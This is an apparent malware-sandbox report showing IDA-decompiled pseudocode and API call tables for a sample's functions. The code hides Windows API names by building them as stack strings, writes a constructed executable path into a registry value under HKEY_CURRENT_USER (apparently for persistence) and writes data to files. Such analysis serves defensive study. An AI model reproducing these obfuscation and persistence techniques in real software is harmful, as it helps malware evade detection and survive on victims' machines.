0x00242084
0x00242086
0x00242089
0x00242089
0x0024208c
0x0024208c
0x0024208f
0x00242092
0x0024209a
0x0024209c
0x0024209e
0x0024209e
0x002420a1
0x002420a1
0x002420a4
0x002420a7
0x002420ca
0x002420ce
0x002420d4
0x002420e7
0x002420f1
0x002420f3
0x002420f6
0x002420f9
0x002420fc
0x002420fc
0x002420ff
0x00242102
0x00242108
0x0024210d
0x00242112
0x00242115
0x00242115
0x00242118
0x0024211b
0x00242139
0x0024213d
0x00242143
0x00242156
0x00242160
0x00242162
0x00242165
0x00242168
0x0024216b
0x0024216b
0x0024216e
0x00242171
0x00242177
0x0024217c
0x00242181
0x00242184
0x00242184
0x00242187
0x0024218a
0x002421a8
0x002421ac
0x002421b2
0x002421c5
0x002421cf
0x002421d1
0x002421d4
0x002421d7
0x002421da
0x002421da
0x002421dd
0x002421e0
0x002421e6
0x002421eb
0x002421f0
0x002421f3
0x002421f3
0x002421f6
0x002421f9
0x00242217
0x0024221b
0x00242221
0x00242234
0x0024223e
0x00242240
0x00242243
0x00242246
0x00242249
0x00242249
0x0024224c
0x0024224f
0x00242255
0x0024225a
0x0024225f
0x00242262
0x00242262
0x00242265
0x00242268
0x00242286
0x0024228a
0x00242290
0x002422a3
0x002422af
0x002422b2
0x002422b5
0x002422ba
0x002422bd
0x002422bd
0x002422c0
0x002422c3
0x002422cc
0x002422ce
0x002422d3
0x002422d6
0x002422d6
0x002422d9
0x002422dc
0x002422fb
0x00242316
0x00242323
0x00242327
0x00242331
0x00242335
0x00242338
0x0024233b
0x0024233e
0x00242342
0x00242345
0x00242349
0x0024234c
0x00242350
0x00242354
0x00242358
0x0024235b
0x0024235e
0x00242362
0x00242365
0x00242369
0x0024236a
0x00242370
0x00242371
0x00242377
0x0024237f
0x00242383
0x00242387
0x00242394
0x00242397
0x0024239d
0x0024239f
0x002423a2
0x002423a2
0x002423a4
0x002423a5
0x002423a9
0x002423ab
0x002423ac
0x002423ac
0x002423af
0x002423b0
0x002423b8
0x002423bb
0x002423be
0x002423c5
0x002423c7
0x002423ca
0x002423cd
0x002423cd
0x002423d0
0x002423d1
0x002423d5
0x002423db
0x002423dd
0x002423e0
0x002423e2
0x002423e2
0x002423e4
0x002423e5
0x002423ec
0x002423ee
0x002423ef
0x002423ef
0x002423f2
0x002423f3
0x002423f9
0x002423fc
0x00242400
0x00242406
0x00242408
0x0024240a
0x0024240a
0x0024240c
0x0024240d
0x00242414
0x00242416
0x00242417
0x00242417
0x0024241a
0x0024241b
0x00242421
0x00242424
0x00242428
0x0024242e
0x00242430
0x00242432
0x00242432
0x00242434
0x00242435
0x0024243c
0x0024243e
0x0024243f
0x0024243f
0x00242442
0x00242443
0x0024244c
0x0024244f
0x0024245a
0x0024245c
0x00242463
0x0024246a
0x00242471
0x00242486
0x00242488
0x0024248e
0x00242497
0x0024249a
0x0024249c
0x0024249c
0x0024249e
0x0024249f
0x0024249f
0x002424a6
0x002424a8
0x002424a8
0x002424a9
0x002424a9
0x002424ac
0x002424ad
0x002424ad
0x002424b3
0x002424b6
0x002424ba
0x002424ba
0x002424bd
0x002424bf
0x002424c2
0x002424c2
0x002424c5
0x002424c5
0x002424c8
0x002424c9
0x002424c9
0x002424cd
0x002424d3
0x002424d6
0x002424d8
0x002424db
0x002424db
0x002424dd
0x002424de
0x002424de
0x002424e2
0x002424e2
0x002424e4
0x002424e4
0x002424e7
0x002424e7
0x002424ea
0x002424eb
0x002424eb
0x002424f1
0x002424f4
0x002424f8
0x002424f8
0x002424fb
0x002424fd
0x00242500
0x00242500
0x00242503
0x00242503
0x00242506
0x00242507
0x00242507
0x0024250b
0x00242511
0x00242514
0x00242516
0x00242519
0x0024251e
0x00242521
0x00242521
0x00242523
0x00242524
0x00242524
0x00242528
0x0024252a
0x0024252a
0x0024252b
0x0024252b
0x0024252e
0x0024252f
0x0024252f
0x00242535
0x00242538
0x0024253c
0x0024253c
0x0024253f
0x00242541
0x00242544
0x00242544
0x00242547
0x00242547
0x0024254a
0x0024254b
0x0024254b
0x0024254f
0x00242555
0x00242558
0x0024255a
0x0024255d
0x00242562
0x00242565
0x00242565
0x00242567
0x00242568
0x00242568
0x0024256c
0x0024256e
0x0024256e
0x0024256f
0x0024256f
0x00242572
0x00242573
0x00242573
0x00242579
0x0024257c
0x00242583
0x00242585
0x00242587
0x0024258a
0x0024258c
0x0024258f
0x0024258f
0x00242592
0x00242592
0x00242594
0x00242595
0x00242595
0x00242599
0x002425a8
0x002425af
0x002425c7
0x002425d1
0x002425db
0x002425e5
0x002425ef
0x002425f9
0x00242603
0x0024260d
0x00242612
0x0024261a
0x00242622
0x0024262a
0x00242632
0x00242637
0x0024263a
0x00242644
0x00000000
0x00242644
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,00000200,00000000,00000002,00000000), ref: 00242071
HeapAlloc.KERNEL32(00000000), ref: 0024207E
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,-00000002,00000000,00000000), ref: 002420CA
GetProcessHeap.KERNEL32(00000008,00000200), ref: 002420EA
HeapAlloc.KERNEL32(00000000), ref: 002420F1
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 00242139
GetProcessHeap.KERNEL32(00000008,00000200), ref: 00242159
RtlAllocateHeap.NTDLL(00000000), ref: 00242160
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 002421A8
GetProcessHeap.KERNEL32(00000008,00000200), ref: 002421C8
HeapAlloc.KERNEL32(00000000), ref: 002421CF
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 00242217
GetProcessHeap.KERNEL32(00000008,00000200), ref: 00242237
HeapAlloc.KERNEL32(00000000), ref: 0024223E
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 00242286
GetProcessHeap.KERNEL32(00000008,00000200), ref: 002422A6
HeapAlloc.KERNEL32(00000000), ref: 002422AD
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 002422FB
GetProcessHeap.KERNEL32(00000008,00000200), ref: 0024230A
HeapAlloc.KERNEL32(00000000), ref: 0024230D
GetProcessHeap.KERNEL32(00000008,00000200), ref: 00242319
HeapAlloc.KERNEL32(00000000), ref: 0024231C
GetProcessHeap.KERNEL32(00000008,00000200), ref: 0024232A
HeapAlloc.KERNEL32(00000000), ref: 00242331
LoadLibraryW.KERNEL32(?), ref: 0024238B
GetProcAddress.KERNEL32(?,?), ref: 00242471
CreateFileA.KERNEL32(?,00000004,00000002,00000000,00000002,00000002,00000000), ref: 00242486
WriteFile.KERNEL32(?,00000000,00000001,?,00000000), ref: 002425A8
CloseHandle.KERNEL32(?), ref: 002425AF
GetProcessHeap.KERNEL32(00000008,00000000), ref: 002425BE
HeapFree.KERNEL32(00000000), ref: 002425C7
GetProcessHeap.KERNEL32(00000008,?), ref: 002425CE
HeapFree.KERNEL32(00000000), ref: 002425D1
GetProcessHeap.KERNEL32(00000008,?), ref: 002425D8
HeapFree.KERNEL32(00000000), ref: 002425DB
GetProcessHeap.KERNEL32(00000008,?), ref: 002425E2
HeapFree.KERNEL32(00000000), ref: 002425E5
GetProcessHeap.KERNEL32(00000008,?), ref: 002425EC
HeapFree.KERNEL32(00000000), ref: 002425EF
GetProcessHeap.KERNEL32(00000008,?), ref: 002425F6
HeapFree.KERNEL32(00000000), ref: 002425F9
GetProcessHeap.KERNEL32(00000008,?), ref: 00242600
HeapFree.KERNEL32(00000000), ref: 00242603
GetProcessHeap.KERNEL32(00000008,?), ref: 0024260A
HeapFree.KERNEL32(00000000), ref: 0024260D

Strings

leA, xrefs: 0024246A
teFi, xrefs: 00242463
Crea, xrefs: 0024245C

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024264C, Relevance: 51.0, APIs: 21, Strings: 8, Instructions: 296
stringlibraryregistry

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0024264C(void* __edx, void* __eflags) {
				intOrPtr* _v8;
				WCHAR* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short* _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short* _v40;
				intOrPtr* _v44;
				char _v47;
				intOrPtr _v51;
				intOrPtr _v55;
				char _v56;
				char _v60;
				short _v63;
				intOrPtr _v67;
				char _v68;
				char _v69;
				char _v70;
				short _v72;
				char _v76;
				short _v80;
				short _v82;
				short _v84;
				short _v86;
				short _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v108;
				short _v110;
				short _v112;
				short _v114;
				short _v116;
				short _v118;
				short _v120;
				short _v122;
				short _v124;
				short _v126;
				short _v128;
				short _v130;
				short _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t85;
				intOrPtr _t86;
				short* _t87;
				intOrPtr _t91;
				short _t92;
				short _t93;
				short _t94;
				struct HINSTANCE__* _t97;
				long _t99;
				WCHAR* _t105;
				signed int _t106;
				void* _t107;
				signed int _t108;
				signed int _t109;
				short _t114;
				short _t115;
				struct HINSTANCE__* _t118;
				void* _t120;
				long _t125;
				intOrPtr* _t142;
				void* _t144;
				short _t153;
				short _t154;
				char _t155;
				void* _t159;
				signed int _t160;
				short _t161;
				short _t162;
				short _t163;
				short _t164;
				short _t165;
				short _t166;
				char _t167;
				signed int _t169;
				signed int _t171;
				short _t173;
				short _t174;
				short _t175;
				short _t176;
				char _t177;
				void* _t179;
				intOrPtr _t180;
				WCHAR* _t182;
				void* _t184;
				short* _t185;
				intOrPtr* _t187;
				void* _t189;
				intOrPtr* _t192;

				_t172 = __edx;
				_t142 = E002429BD(__edx, _t184, __eflags, 0x10);
				_v44 = _t142;
				 *((intOrPtr*)(_t142 + 8)) = 0x26130c;
				 *((intOrPtr*)(_t142 + 0xc)) = 0xb;
				 *_t142 = 0x2612d8;
				 *((intOrPtr*)(_t142 + 4)) = 0x1a;
				_v32 = E00241DEF(_t142, __edx, _t179);
				 *_t142 = 0x261330;
				 *((intOrPtr*)(_t142 + 4)) = 6;
				_t85 = E00241DEF(_t142, __edx, _t179);
				_v36 = _t85;
				_t86 = 0x2e;
				 *_t142 = 0x2612a8;
				 *((intOrPtr*)(_t142 + 4)) = _t86;
				_t87 = E00241DEF(_t142, __edx, _t179);
				_t180 = 0x16;
				_v24 = _t87;
				 *_t142 = 0x261338;
				 *((intOrPtr*)(_t142 + 4)) = _t180;
				_v8 = E00241DEF(_t142, __edx, _t180);
				 *_t142 = 0x2612f4;
				 *((intOrPtr*)(_t142 + 4)) = 0x18;
				_t185 = E00241DEF(_t142, _t172, _t180);
				 *_t142 = 0x26135c;
				_v40 = _t185;
				 *((intOrPtr*)(_t142 + 4)) = 0x1a;
				_v16 = E00241DEF(_t142, _t172, _t180);
				 *_t142 = 0x261318;
				 *((intOrPtr*)(_t142 + 4)) = _t180;
				_t91 = E00241DEF(_t142, _t172, _t180);
				_v20 = _t91;
				_t92 = 0x41;
				_v104 = _t92;
				_t93 = 0x64;
				_t153 = 0x76;
				_v100 = _t153;
				_t154 = 0x61;
				_v98 = _t154;
				_t155 = 0x70;
				_t173 = 0x69;
				_v94 = _t173;
				_t174 = 0x33;
				_v92 = _t174;
				_t175 = 0x32;
				_v90 = _t175;
				_t176 = 0x2e;
				_v102 = _t93;
				_v86 = _t93;
				_t94 = 0x6c;
				_v96 = _t155;
				_v88 = _t176;
				_v84 = _t94;
				_v82 = _t94;
				_v60 = 0x4f676552;
				_v80 = 0;
				_v56 = _t155;
				_v55 = 0x654b6e65;
				_v51 = 0x57784579;
				_v47 = 0;
				_t97 = LoadLibraryW( &_v104);
				_t37 =  &_v60; // 0x4f676552
				GetProcAddress(_t97, _t37);
				_t99 = RegOpenKeyExW(0x80000001, _t185, 0, 2,  &_v28); // executed
				if(_t99 == 0) {
					_t144 = HeapAlloc(GetProcessHeap(), 8, 0x400);
					__eflags = _t144;
					if(_t144 == 0) {
						goto L1;
					}
					_t182 = HeapAlloc(GetProcessHeap(), 8, 0x400);
					__eflags = _t182;
					if(__eflags == 0) {
						goto L1;
					}
					_t187 = _v8;
					_t105 = E00245922(_t144,  &_v28, _t176, __eflags, _v16); // executed
					 *_t192 = 0x259820;
					_v12 = _t105;
					_t106 = E00243675( &_v28);
					_t159 = _t187;
					while(1) {
						__eflags = _t106;
						if(_t106 == 0) {
							break;
						}
						_push(0x259820);
						_push(_t187);
						_t107 = E00243675(_t159);
						_push(0x259820);
						_t42 = _t107 + 2; // 0x2
						_t187 = _t42;
						_push(_t187);
						_t106 = E00243675(_t159);
						_t192 = _t192 + 0x10;
					}
					_t108 = 0x259824;
					while(1) {
						_t160 =  *_t187;
						__eflags = _t160 -  *_t108;
						if(_t160 !=  *_t108) {
							break;
						}
						__eflags = _t160;
						if(_t160 == 0) {
							L12:
							_t109 = 0;
							L14:
							__eflags = _t109;
							if(__eflags == 0) {
								lstrcatW(_t182, _v12);
								lstrcatW(_t182, "\\");
								_push(_v8);
							} else {
								E00242030(_t176, __eflags); // executed
								lstrcatW(_t182, _v12);
								lstrcatW(_t182, "\\");
								_push(_v20);
							}
							lstrcatW(_t182, ??);
							lstrcatW(_t144, _t182);
							_t114 = 0x41;
							_v132 = _t114;
							_t115 = 0x64;
							_t161 = 0x76;
							_t177 = 0x61;
							_v128 = _t161;
							_t162 = 0x70;
							_v124 = _t162;
							_t163 = 0x69;
							_v122 = _t163;
							_t164 = 0x33;
							_v120 = _t164;
							_t165 = 0x32;
							_v118 = _t165;
							_t166 = 0x2e;
							_v130 = _t115;
							_v114 = _t115;
							_v116 = _t166;
							_t167 = 0x6c;
							_v108 = 0;
							_v126 = _t177;
							_v112 = _t167;
							_v110 = _t167;
							_v76 = 0x53676552;
							_v72 = 0x7465;
							_v70 = 0x56;
							_v69 = _t177;
							_v68 = _t167;
							_v67 = 0x78456575;
							_v63 = 0x57;
							_t118 = LoadLibraryW( &_v132);
							_t70 =  &_v76; // 0x53676552
							GetProcAddress(_t118, _t70);
							__eflags = 0;
							_t120 = _t144;
							_t71 = _t120 + 2; // 0x2
							_t189 = _t71;
							do {
								_t169 =  *_t120;
								_t120 = _t120 + 2;
								__eflags = _t169;
							} while (_t169 != 0);
							_t190 = _v24;
							_t125 = RegSetValueExW(_v28, _v24, 0, 1, _t144, 2 + (_t120 - _t189 >> 1) * 2); // executed
							__eflags = _t125;
							if(_t125 == 0) {
								E002429B8(_v32);
								E002429B8(_v36);
								E002429B8(_t190);
								E002429B8(_v8);
								E002429B8(_v40);
								E002429B8(_v16);
								E002429B8(_v20);
								_push(0x10);
								E002429F9(_v44);
								HeapFree(GetProcessHeap(), 8, _t144);
								__eflags = 1;
								return 1;
							}
							E002443C2(_t144);
							goto L1;
						}
						_t171 =  *((intOrPtr*)(_t187 + 2));
						__eflags = _t171 -  *((intOrPtr*)(_t108 + 2));
						if(_t171 !=  *((intOrPtr*)(_t108 + 2))) {
							break;
						}
						_t187 = _t187 + 4;
						_t108 = _t108 + 4;
						__eflags = _t171;
						if(_t171 != 0) {
							continue;
						}
						goto L12;
					}
					asm("sbb eax, eax");
					_t109 = _t108 | 0x00000001;
					__eflags = _t109;
					goto L14;
				}
				L1:
				return 0;
			}

0x0024264c
0x0024265f
0x00242664
0x00242667
0x0024266e
0x00242675
0x0024267b
0x00242689
0x0024268c
0x00242692
0x00242699
0x002426a0
0x002426a5
0x002426a6
0x002426ac
0x002426af
0x002426b6
0x002426b9
0x002426bc
0x002426c2
0x002426cc
0x002426cf
0x002426d5
0x002426e1
0x002426e3
0x002426eb
0x002426ee
0x002426fc
0x002426ff
0x00242705
0x00242708
0x0024270f
0x00242712
0x00242715
0x00242719
0x0024271c
0x0024271f
0x00242723
0x00242726
0x0024272a
0x0024272d
0x00242730
0x00242734
0x00242737
0x0024273b
0x0024273e
0x00242742
0x00242745
0x00242749
0x0024274d
0x0024274e
0x00242752
0x00242756
0x0024275a
0x00242762
0x00242769
0x00242771
0x00242774
0x0024277b
0x00242782
0x00242785
0x0024278b
0x00242790
0x002427a3
0x002427a7
0x002427c8
0x002427ca
0x002427cc
0x00000000
0x00000000
0x002427da
0x002427dc
0x002427de
0x00000000
0x00000000
0x002427e3
0x002427e6
0x002427eb
0x002427f3
0x002427f6
0x002427fc
0x0024281b
0x0024281b
0x0024281d
0x00000000
0x00000000
0x002427ff
0x00242804
0x00242805
0x0024280a
0x0024280f
0x0024280f
0x00242812
0x00242813
0x00242818
0x00242818
0x0024281f
0x00242824
0x00242824
0x00242827
0x0024282a
0x00000000
0x00000000
0x0024282c
0x0024282f
0x00242846
0x00242846
0x0024284f
0x0024284f
0x00242851
0x0024287b
0x00242883
0x00242885
0x00242853
0x00242853
0x00242862
0x0024286a
0x0024286c
0x0024286c
0x00242889
0x0024288d
0x00242891
0x00242894
0x00242898
0x0024289b
0x0024289e
0x002428a1
0x002428a5
0x002428a8
0x002428ac
0x002428af
0x002428b3
0x002428b6
0x002428ba
0x002428bd
0x002428c1
0x002428c2
0x002428c6
0x002428ce
0x002428d2
0x002428d3
0x002428db
0x002428df
0x002428e3
0x002428e7
0x002428ee
0x002428f4
0x002428f8
0x002428fb
0x002428fe
0x00242905
0x0024290b
0x00242911
0x00242916
0x0024291e
0x00242920
0x00242922
0x00242922
0x00242925
0x00242925
0x00242928
0x0024292b
0x0024292b
0x00242932
0x00242949
0x0024294b
0x0024294d
0x0024295e
0x00242966
0x0024296c
0x00242974
0x0024297c
0x00242984
0x0024298c
0x00242991
0x00242996
0x002429a8
0x002429b0
0x00000000
0x002429b0
0x00242950
0x00000000
0x00242955
0x00242831
0x00242835
0x00242839
0x00000000
0x00000000
0x0024283b
0x0024283e
0x00242841
0x00242844
0x00000000
0x00000000
0x00000000
0x00242844
0x0024284a
0x0024284c
0x0024284c
0x00000000
0x0024284c
0x002427a9
0x00000000

APIs

LoadLibraryW.KERNEL32(?), ref: 00242785
GetProcAddress.KERNEL32(00000000,RegO), ref: 00242790
RegOpenKeyExW.KERNEL32(80000001,00000000,00000000,00000002,?), ref: 002427A3
GetProcessHeap.KERNEL32(00000008,00000400), ref: 002427BD
HeapAlloc.KERNEL32(00000000), ref: 002427C6
GetProcessHeap.KERNEL32(00000008,00000400), ref: 002427D5
HeapAlloc.KERNEL32(00000000), ref: 002427D8
_wcsstr.LIBVCRUNTIME ref: 002427F6
_wcsstr.LIBVCRUNTIME ref: 00242805
_wcsstr.LIBVCRUNTIME ref: 00242813

Part of subcall function 00242030: GetProcessHeap.KERNEL32(00000008,00000200,00000000,00000002,00000000), ref: 00242071
Part of subcall function 00242030: HeapAlloc.KERNEL32(00000000), ref: 0024207E
Part of subcall function 00242030: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,-00000002,00000000,00000000), ref: 002420CA
Part of subcall function 00242030: GetProcessHeap.KERNEL32(00000008,00000200), ref: 002420EA
Part of subcall function 00242030: HeapAlloc.KERNEL32(00000000), ref: 002420F1
Part of subcall function 00242030: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 00242139
Part of subcall function 00242030: GetProcessHeap.KERNEL32(00000008,00000200), ref: 00242159
Part of subcall function 00242030: RtlAllocateHeap.NTDLL(00000000), ref: 00242160
Part of subcall function 00242030: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 002421A8
Part of subcall function 00242030: GetProcessHeap.KERNEL32(00000008,00000200), ref: 002421C8
Part of subcall function 00242030: HeapAlloc.KERNEL32(00000000), ref: 002421CF
Part of subcall function 00242030: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 00242217
Part of subcall function 00242030: GetProcessHeap.KERNEL32(00000008,00000200), ref: 00242237
Part of subcall function 00242030: HeapAlloc.KERNEL32(00000000), ref: 0024223E
Part of subcall function 00242030: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 00242286
Part of subcall function 00242030: GetProcessHeap.KERNEL32(00000008,00000200), ref: 002422A6
Part of subcall function 00242030: HeapAlloc.KERNEL32(00000000), ref: 002422AD
Part of subcall function 00242030: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 002422FB
Part of subcall function 00242030: GetProcessHeap.KERNEL32(00000008,00000200), ref: 0024230A
Part of subcall function 00242030: HeapAlloc.KERNEL32(00000000), ref: 0024230D
Part of subcall function 00242030: GetProcessHeap.KERNEL32(00000008,00000200), ref: 00242319
Part of subcall function 00242030: HeapAlloc.KERNEL32(00000000), ref: 0024231C
Part of subcall function 00242030: GetProcessHeap.KERNEL32(00000008,00000200), ref: 0024232A
Part of subcall function 00242030: HeapAlloc.KERNEL32(00000000), ref: 00242331
Part of subcall function 00242030: LoadLibraryW.KERNEL32(?), ref: 0024238B
Part of subcall function 00242030: GetProcAddress.KERNEL32(?,?), ref: 00242471
Part of subcall function 00242030: CreateFileA.KERNEL32(?,00000004,00000002,00000000,00000002,00000002,00000000), ref: 00242486
Part of subcall function 00242030: WriteFile.KERNEL32(?,00000000,00000001,?,00000000), ref: 002425A8
Part of subcall function 00242030: CloseHandle.KERNEL32(?), ref: 002425AF
Part of subcall function 00242030: GetProcessHeap.KERNEL32(00000008,00000000), ref: 002425BE
Part of subcall function 00242030: HeapFree.KERNEL32(00000000), ref: 002425C7
Part of subcall function 00242030: GetProcessHeap.KERNEL32(00000008,?), ref: 002425CE
Part of subcall function 00242030: HeapFree.KERNEL32(00000000), ref: 002425D1
Part of subcall function 00242030: GetProcessHeap.KERNEL32(00000008,?), ref: 002425D8
Part of subcall function 00242030: HeapFree.KERNEL32(00000000), ref: 002425DB
Part of subcall function 00242030: GetProcessHeap.KERNEL32(00000008,?), ref: 002425E2
Part of subcall function 00242030: HeapFree.KERNEL32(00000000), ref: 002425E5
Part of subcall function 00242030: GetProcessHeap.KERNEL32(00000008,?), ref: 002425EC
Part of subcall function 00242030: HeapFree.KERNEL32(00000000), ref: 002425EF
Part of subcall function 00242030: GetProcessHeap.KERNEL32(00000008,?), ref: 002425F6
Part of subcall function 00242030: HeapFree.KERNEL32(00000000), ref: 002425F9
Part of subcall function 00242030: GetProcessHeap.KERNEL32(00000008,?), ref: 00242600
Part of subcall function 00242030: HeapFree.KERNEL32(00000000), ref: 00242603
Part of subcall function 00242030: GetProcessHeap.KERNEL32(00000008,?), ref: 0024260A
Part of subcall function 00242030: HeapFree.KERNEL32(00000000), ref: 0024260D

lstrcatW.KERNEL32(00000000,?), ref: 00242862
lstrcatW.KERNEL32(00000000,00259728), ref: 0024286A
lstrcatW.KERNEL32(00000000,?), ref: 0024287B
lstrcatW.KERNEL32(00000000,00259728), ref: 00242883
lstrcatW.KERNEL32(00000000,?), ref: 00242889
lstrcatW.KERNEL32(00000000,00000000), ref: 0024288D
LoadLibraryW.KERNEL32(?), ref: 0024290B
GetProcAddress.KERNEL32(00000000,RegSet), ref: 00242916
RegSetValueExW.KERNEL32(?,?,00000000,00000001,00000000,-00000002), ref: 00242949
GetProcessHeap.KERNEL32(00000008,00000000), ref: 002429A1
HeapFree.KERNEL32(00000000), ref: 002429A8

Strings

W, xrefs: 00242905
yExW, xrefs: 0024277B
V, xrefs: 002428F4
enKe, xrefs: 00242774
exe, xrefs: 0024281F
RegO, xrefs: 0024278B, 0024278E
RegSet, xrefs: 00242911, 00242914
ueEx, xrefs: 002428FE

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024155B, Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 160
libraryfile

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E0024155B(void* __ecx, void* __edx, long _a4) {
				struct _OVERLAPPED* _v7;
				char _v8;
				char _v9;
				short _v11;
				char _v12;
				short _v14;
				char _v15;
				char _v16;
				short _v18;
				char _v19;
				char _v20;
				short _v22;
				char _v23;
				short _v25;
				char _v26;
				char _v27;
				char _v28;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				short _v82;
				short _v84;
				short _t62;
				short _t63;
				short _t64;
				short _t65;
				short _t66;
				short _t67;
				struct HINSTANCE__* _t70;
				void* _t72;
				struct _OVERLAPPED* _t73;
				short _t74;
				short _t75;
				short _t76;
				short _t77;
				short _t78;
				short _t79;
				short _t80;
				char _t82;
				struct HINSTANCE__* _t84;
				int _t86;
				char _t92;
				struct _OVERLAPPED* _t93;
				char _t96;
				char _t98;
				char _t102;
				char _t103;
				signed int _t104;
				void** _t105;
				void* _t107;

				_t104 = _a4;
				if(_t104 <  *((intOrPtr*)(__ecx + 8))) {
					_t105 =  *( *((intOrPtr*)(__ecx + 4)) + _t104 * 4);
					E002410CD(__edx, __eflags, _t105);
					_t62 = 0x4b;
					_t96 = 0x65;
					_t92 = 0x72;
					_v56 = _t62;
					_t63 = 0x6e;
					_t102 = 0x6c;
					_v50 = _t63;
					_t64 = 0x33;
					_v44 = _t64;
					_t65 = 0x32;
					_v42 = _t65;
					_t66 = 0x2e;
					_v40 = _t66;
					_t67 = 0x64;
					_v38 = _t67;
					_v32 = 0;
					_v52 = _t92;
					_v27 = _t92;
					_t93 = 0;
					_v54 = _t96;
					_v48 = _t96;
					_v46 = _t102;
					_v36 = _t102;
					_v34 = _t102;
					_v28 = 0x43;
					_v26 = _t96;
					_v25 = 0x7461;
					_v23 = _t96;
					_v22 = 0x6946;
					_v20 = _t102;
					_v19 = _t96;
					_v18 = 0x57;
					_t70 = LoadLibraryW( &_v56);
					__eflags = _t70;
					if(_t70 != 0) {
						GetProcAddress(_t70,  &_v28);
						__eflags = _t105[9] - 0x54;
						_push(0);
						if(_t105[9] != 0x54) {
							_push(_t105[9]);
						} else {
							_push(6);
						}
						_t72 = CreateFileW(_t105[4], 4, 2, _t93, 2, ??, ??); // executed
						_t107 = _t72;
						__eflags = _t107 - 0xffffffff;
						if(_t107 == 0xffffffff) {
							L10:
							_t73 = 0;
							goto L15;
						} else {
							_t74 = 0x4b;
							_t98 = 0x65;
							_v84 = _t74;
							_t75 = 0x72;
							_v80 = _t75;
							_t76 = 0x6e;
							_t103 = 0x6c;
							_v78 = _t76;
							_t77 = 0x33;
							_v72 = _t77;
							_t78 = 0x32;
							_v70 = _t78;
							_t79 = 0x2e;
							_v68 = _t79;
							_t80 = 0x64;
							_v66 = _t80;
							_v60 = 0;
							_t82 = 0x72;
							_v15 = _t82;
							_v82 = _t98;
							_v76 = _t98;
							_v74 = _t103;
							_v64 = _t103;
							_v62 = _t103;
							_v16 = 0x57;
							_v14 = 0x7469;
							_v12 = _t98;
							_v11 = 0x6946;
							_v9 = _t103;
							_v8 = _t98;
							_v7 = _t93;
							_t84 = LoadLibraryW( &_v84);
							__eflags = _t84;
							if(_t84 == 0) {
								goto L10;
							}
							GetProcAddress(_t84,  &_v16);
							_t86 = WriteFile(_t107,  *_t105, _t105[2],  &_a4, _t93); // executed
							__eflags = _t86;
							if(_t86 != 0) {
								__eflags = _a4 - _t105[2];
								if(_a4 == _t105[2]) {
									_t93 = 1;
								}
								CloseHandle(_t107);
								_t73 = _t93;
								L15:
								L16:
								return _t73;
							}
							CloseHandle(_t107);
							goto L10;
						}
					}
					_t73 = 0;
					goto L16;
				}
				return 0;
			}

0x00241562
0x00241568
0x00241575
0x00241579
0x00241580
0x00241583
0x00241586
0x00241589
0x0024158d
0x00241590
0x00241593
0x00241597
0x0024159a
0x0024159e
0x002415a1
0x002415a5
0x002415a6
0x002415ac
0x002415ad
0x002415b3
0x002415ba
0x002415be
0x002415c1
0x002415c4
0x002415c8
0x002415cc
0x002415d0
0x002415d4
0x002415d8
0x002415dc
0x002415df
0x002415e5
0x002415e8
0x002415ee
0x002415f1
0x002415f4
0x002415fa
0x00241600
0x00241602
0x00241611
0x00241617
0x0024161b
0x0024161c
0x002416e3
0x00241622
0x00241622
0x00241622
0x0024162e
0x00241630
0x00241632
0x00241635
0x002416df
0x002416df
0x00000000
0x0024163b
0x0024163d
0x00241640
0x00241643
0x00241647
0x0024164a
0x0024164e
0x00241651
0x00241654
0x00241658
0x0024165b
0x0024165f
0x00241662
0x00241666
0x00241669
0x0024166d
0x0024166e
0x00241676
0x0024167a
0x0024167b
0x00241682
0x00241686
0x0024168a
0x0024168e
0x00241692
0x00241696
0x0024169a
0x002416a0
0x002416a3
0x002416a9
0x002416ac
0x002416af
0x002416b2
0x002416b8
0x002416ba
0x00000000
0x00000000
0x002416c1
0x002416d2
0x002416d4
0x002416d6
0x002416ee
0x002416f1
0x002416f3
